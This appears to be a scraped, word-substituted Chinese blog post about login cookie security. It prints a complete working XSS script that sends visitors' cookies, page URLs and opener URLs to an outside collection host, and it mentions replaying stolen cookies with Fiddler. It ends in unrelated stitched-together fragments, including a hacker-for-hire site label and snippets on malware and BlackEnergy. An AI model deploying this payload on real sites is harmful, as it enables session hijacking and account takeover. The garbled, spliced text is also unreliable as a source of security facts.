作为一个web开发者,避免不了用户登录功用,但是有多少知道用户登录的一些安全防备技能呢?
一般的菜鸟只知道把用户信息保存到Cookie 即可,登录只管判别Cookie是否存在,凭借着cookie值的存在状况来判别用户是否登录,更有一些乃至把用户暗码也保存在Cookie中,这是极端风险的,人家要搞你分分钟能够模仿你的Cookie来登录你的用户,做一些风险的工作。
1、进犯者怎样拿到你的登录的Cookie值。
现在各种进犯技能,现在我只了解XSS进犯方式,就在前一段时间,我自己建立了一个自己的社区站点 在群里边评论遇到了一个大神,做过一个XSS进犯的测验,他在我的社区里边发布了一篇博客,里边嵌入了XSS进犯脚步,脚步代码如下:
(function(){(new Image()).src='http://xss.sssie.com/index.php?do=api&id=RQTPpx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})(); if(''==1){keep=new Image();keep.src='http://xss.sssie.com/index.php?do=keepsession&id=RQTPpx&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
这段代码,是经过第三方XSS渠道来的,不过现在有许多的免费XSS渠道,自己也能够建立一个。
经过嵌入以上脚步,只需用户登录了自己的帐号,一旦阅读了进犯者发布的博客,即进犯成功,XSS第三方渠道里边发送有关我登录的Cookie 给进犯者,这样你登录的Cookie值立马给盗取,是不是很风险呢?
2、进犯者模仿Cookie登录
做过后台开发的人都知道怎样模仿Cookie信息去登录,除非是菜鸟,这个我就不多说了,
不过不会后台开发的人,会运用一些东西,比方Fiddler 就很简单把Cookie信息模仿登录了,这儿就不逐个叙述完成进程了
[1] [2] 黑客接单网
现在逆向工程师、安全剖析人员和事情呼应人员在剖析歹意软件二进制文件时,现已具有了许多老练的东西。在进行歹意软件剖析时,为了逐渐搜集有关二进制文件功用的头绪,规划对应的检测办法,并确认终究的环境办法,他...
11、princess (新呈现)4种日志记载内容比照效果:Windows PowerShell 将记载指令、脚本块、函数和脚本的处理,不管是以交互方法调用仍是经过主动方法处理7月黑客网络接单,找黑客...
FireEye收集了168个PUPYRAT样本进行比较。 尽管导入哈希值(IMPHASH)不足以归因溯源,但咱们发现,在指定的抽样中,进犯者的IMPHASH仅在六个样本中被发现,其间两个被承认归于在M...
print 'response code: ' + str(r.status_code)在完成操控脚本的进程中,HackRF存在的两个严峻约束:一方面HackRF运用USB通讯接口决议了它的通讯推迟巨...
Office类型的缝隙运用(CVE-2014-4114)–>邮件–>下载歹意组件BlackEnergy侵入职工电力工作体系–>BlackEnergy持续下载歹意组件(KillDisk...
本文咱们会介绍怎么经过运用公共言语运转时运用程序域办理器履行恣意代码并保护对Microsoft Windows体系的拜访。 东西、安全性评价和测验 在安全性评价中,取得对安排内部网络的初始拜访是一项十...